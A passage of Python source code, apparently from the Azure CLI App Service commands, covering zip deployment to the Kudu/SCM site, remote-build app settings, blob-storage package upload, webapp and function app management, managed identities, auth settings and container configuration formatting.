except ValueError:
raise ResourceNotFoundError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['x-ms-client-request-id'] = cmd.cli_ctx.data['headers']['x-ms-client-request-id']
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check the status of async deployment
if res.status_code == 202:
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
# check if there's an ongoing process
if res.status_code == 409:
raise UnclassifiedUserFault("There may be an ongoing deployment or your app setting has "
"WEBSITE_RUN_FROM_PACKAGE. Please track your deployment in {} and ensure the "
"WEBSITE_RUN_FROM_PACKAGE app setting is removed. Use 'az webapp config "
"appsettings list --name MyWebapp --resource-group MyResourceGroup --subscription "
"MySubscription' to list app settings and 'az webapp config appsettings delete "
"--name MyWebApp --resource-group MyResourceGroup --setting-names <setting-names> "
"to delete them.".format(deployment_status_url))
# check if an error occurred during deployment
if res.status_code:
raise AzureInternalError("An error occured during deployment. Status Code: {}, Details: {}"
.format(res.status_code, res.text))
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise ResourceNotFoundError('Could not find an \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
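# A worked example of the progress math above, with illustrative numbers only:
# for current == 5_242_880 and total == 20_971_520 bytes, filled_length == 7 and percents == 25.0,
# so the reported message is 'Uploading ' + '=' * 7 + '-' * 23 + ' 25.0%'.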
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.utcnow()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting], slot=slot)
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code != 200:
raise ex
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(cmd, instance, client_affinity_enabled=None, https_only=None, minimum_elastic_instance_count=None,
prewarmed_instance_count=None):
if 'function' in instance.kind:
raise ValidationError("please use 'az functionapp update' to update this function app")
if minimum_elastic_instance_count or prewarmed_instance_count:
args = ["--minimum-elastic-instance-count", "--prewarmed-instance-count"]
plan = get_app_service_plan_from_webapp(cmd, instance)
sku = _normalize_sku(plan.sku.name)
if get_sku_tier(sku) not in ["PREMIUMV2", "PREMIUMV3"]:
raise ValidationError("{} are only supported for elastic premium V2/V3 SKUs".format(str(args)))
if not plan.elastic_scale_enabled:
raise ValidationError("Elastic scale is not enabled on the App Service Plan. Please update the plan ")
if (minimum_elastic_instance_count or 0) > plan.maximum_elastic_worker_count:
raise ValidationError("--minimum-elastic-instance-count: Minimum elastic instance count is greater than "
"the app service plan's maximum Elastic worker count. "
"Please choose a lower count or update the plan's maximum ")
if (prewarmed_instance_count or 0) > plan.maximum_elastic_worker_count:
raise ValidationError("--prewarmed-instance-count: Prewarmed instance count is greater than "
"the app service plan's maximum Elastic worker count. "
"Please choose a lower count or update the plan's maximum ")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
if minimum_elastic_instance_count is not None:
from azure.mgmt.web.models import SiteConfig
# Need to create a new SiteConfig object to ensure that the new property is included in request body
conf = SiteConfig(**instance.site_config.as_dict())
conf.minimum_elastic_instance_count = minimum_elastic_instance_count
instance.site_config = conf
if prewarmed_instance_count is not None:
instance.site_config.pre_warmed_instance_count = prewarmed_instance_count
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently, switching is only supported between Consumption and Elastic Premium plans.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not function_app or 'function' not in function_app.kind:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return function_app
def list_webapp(cmd, resource_group_name=None):
full_list = _list_app(cmd.cli_ctx, resource_group_name)
# skip apps with no kind set as well as function apps
return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
slot, request)
def list_function_app(cmd, resource_group_name=None):
return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(),
_list_app(cmd.cli_ctx, resource_group_name)))
def show_app(cmd, resource_group_name, name, slot=None):
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not app:
raise ResourceNotFoundError("Unable to find resource'{}', in ResourceGroup '{}'.".format(name,
resource_group_name))
app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration',
slot)
_rename_server_farm_props(app)
_fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot)
return app
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = []
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
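# Hypothetical illustration of the return value above (not part of the original source): for a single
# user-assigned identity resource ID 'uai_id' and no MSI_LOCAL_ID sentinel, the call
# _build_identities_info(['uai_id']) returns
# ({'type': 'UserAssigned', 'userAssignedIdentities': {'uai_id': {}}}, 'UserAssigned', ['uai_id'], False).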
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('UserAssignedIdentity')
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
extra_parameter=webapp, slot=slot)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, identity_role=role, identity_scope=scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not web_app:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return web_app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('UserAssignedIdentity')
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise ResourceNotFoundError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
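# Hypothetical illustration of the accepted formats (not part of the original source):
#   is_auth_runtime_version_valid('~2')     -> True  (tilde followed by an integer)
#   is_auth_runtime_version_valid('1.22.1') -> True  (exactly three integer components)
#   is_auth_runtime_version_valid('1.22')   -> False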
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise InvalidArgumentValueError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is already used in azure.cli.core.commands,
# and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
def list_runtimes(cmd, os_type=None, linux=False):
if os_type is not None and linux:
raise MutuallyExclusiveArgumentError("Cannot use both --os-type and --linux")
if linux:
linux = True
windows = False
else:
# show both linux and windows stacks by default
linux = True
windows = True
if os_type == WINDOWS_OS_NAME:
linux = False
if os_type == LINUX_OS_NAME:
windows = False
runtime_helper = _StackRuntimeHelper(cmd=cmd, linux=linux, windows=windows)
return runtime_helper.get_stack_names_only(delimiter=":")
def list_function_app_runtimes(cmd, os_type=None):
# show both linux and windows stacks by default
linux = True
windows = True
if os_type == WINDOWS_OS_NAME:
linux = False
if os_type == LINUX_OS_NAME:
windows = False
runtime_helper = _FunctionAppStackRuntimeHelper(cmd=cmd, linux=linux, windows=windows)
linux_stacks = [r.to_dict() for r in runtime_helper.stacks if r.linux]
windows_stacks = [r.to_dict() for r in runtime_helper.stacks if not r.linux]
if linux and not windows:
return linux_stacks
if windows and not linux:
return windows_stacks
return {WINDOWS_OS_NAME: windows_stacks, LINUX_OS_NAME: linux_stacks}
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None): # pylint: disable=unused-argument
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check whether app settings have propagated to the Kudu (SCM) site by calling its api/settings endpoint
# should_have [] is a list of app setting names that are expected to be present
# should_not_have [] is a list of app setting names that are expected to be absent
# should_contain {} is a dictionary of app settings that are expected to be present with these exact values
# Returns True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
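# Hypothetical usage of the check above (names are illustrative, not from the original source):
#   validate_app_settings_in_scm(cmd, 'my-rg', 'my-app',
#                                should_contain={'SCM_DO_BUILD_DURING_DEPLOYMENT': 'true'},
#                                should_not_have=['WEBSITE_RUN_FROM_PACKAGE'])
# returns True only when the Kudu settings response carries the exact values in should_contain
# and none of the keys in should_not_have.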
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
try:
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
except StopIteration:
pass
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
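# Hypothetical illustration of the formatting above (not part of the original source):
#   _format_fx_version('nginx')                       -> 'DOCKER|nginx'
#   _format_fx_version('<base64-config>', 'COMPOSE')  -> 'COMPOSE|<base64-config>'
#   _format_fx_version('   ')                         -> ' '  (blank image names collapse to a single space)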
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise ResourceNotFoundError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES):
raise ValidationError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
    # Base64-encode the file contents and return them as a UTF-8 string
    return b64encode(config_file_bytes).decode('utf-8')
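# The encode/decode helpers above are complementary over the multicontainer payload; a typical flow is
# (sketch, the compose file name is hypothetical):
#   encoded = _get_linux_multicontainer_encoded_config_from_file('docker-compose.yml')
#   linux_fx_version = _format_fx_version(encoded, 'COMPOSE')   # -> 'COMPOSE|<base64>'
#   _get_linux_multicontainer_decoded_config(...) later recovers the original file contents.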
# For any modifications to the non-optional parameters, adjust the reflection logic
# in the method accordingly.
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
vnet_route_all_enabled=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
